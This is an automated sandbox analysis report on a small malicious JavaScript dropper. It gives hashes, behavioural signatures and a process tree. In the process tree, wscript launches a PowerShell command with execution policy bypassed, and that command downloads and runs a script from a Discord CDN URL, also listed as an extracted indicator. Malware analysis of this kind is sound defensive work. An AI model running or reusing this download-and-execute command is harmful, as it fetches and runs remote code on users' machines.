Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
02-12-2021 03:07
Static task
static1
Behavioral task
behavioral1
Sample
34ce23e0cac1eb85e253f52b87c53436.js
Resource
win7-en-20211104
windows7_x64
0 signatures
0 seconds
General
-
Target
34ce23e0cac1eb85e253f52b87c53436.js
-
Size
256B
-
MD5
34ce23e0cac1eb85e253f52b87c53436
-
SHA1
fbc026960fc1009eae89f7506276a5e153ec58ec
-
SHA256
ba2680549e33524c3b96c4b2be01c47297e977fe7532034936d8baa4f6dc3104
-
SHA512
488b7d7cc0a3a723273f4bac17f4b45daa9c894d03af15b6c14e84d9f9b4ee3fa7d263b03fb3c12c78361a4a9d92b77a6e7a25e323b9494e937ba1ca6be92c9d
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 860 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 860 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 1552 wrote to memory of 860 1552 wscript.exe powershell.exe PID 1552 wrote to memory of 860 1552 wscript.exe powershell.exe PID 1552 wrote to memory of 860 1552 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\34ce23e0cac1eb85e253f52b87c53436.js1⤵
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:860
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/860-56-0x0000000000000000-mapping.dmp
-
memory/860-59-0x00000000025A0000-0x00000000025A2000-memory.dmpFilesize
8KB
-
memory/860-60-0x00000000025A2000-0x00000000025A4000-memory.dmpFilesize
8KB
-
memory/860-61-0x00000000025A4000-0x00000000025A7000-memory.dmpFilesize
12KB
-
memory/860-58-0x000007FEF28B0000-0x000007FEF340D000-memory.dmpFilesize
11.4MB
-
memory/860-62-0x00000000025AB000-0x00000000025CA000-memory.dmpFilesize
124KB
-
memory/1552-55-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmpFilesize
8KB